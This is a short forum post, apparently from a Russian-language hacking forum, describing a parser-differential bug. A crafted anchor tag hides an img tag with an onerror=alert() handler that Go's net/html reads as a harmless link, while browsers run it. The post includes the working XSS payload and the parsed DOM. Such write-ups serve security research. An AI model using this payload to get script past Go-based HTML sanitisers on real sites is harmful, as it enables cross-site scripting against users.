Загрузка...

Bypass tag filtering in golang

Thread in Web vulnerabilities created by PowerDevil Feb 13, 2024. 271 view

  1. PowerDevil
    PowerDevil Topic starter Feb 13, 2024 12,725 Aug 27, 2022
    обход фильтрации тегов в golang.
    Для строки
    ⁡<a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a>
    ⁡golang net/html увидит следующий DOM​
    Code
      html
    head
    body
    a
    ->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1>
    То есть он будет думать что у нас есть только ссылка на google.com
    В тоже время в браузере вы увидите, что у нас загрузился тег
    ⁡<img>
    ⁡ и всплыл popup alert
    Баг существует в последней версии golang и будет исправлен в next релизе.​
     
Loading...
Top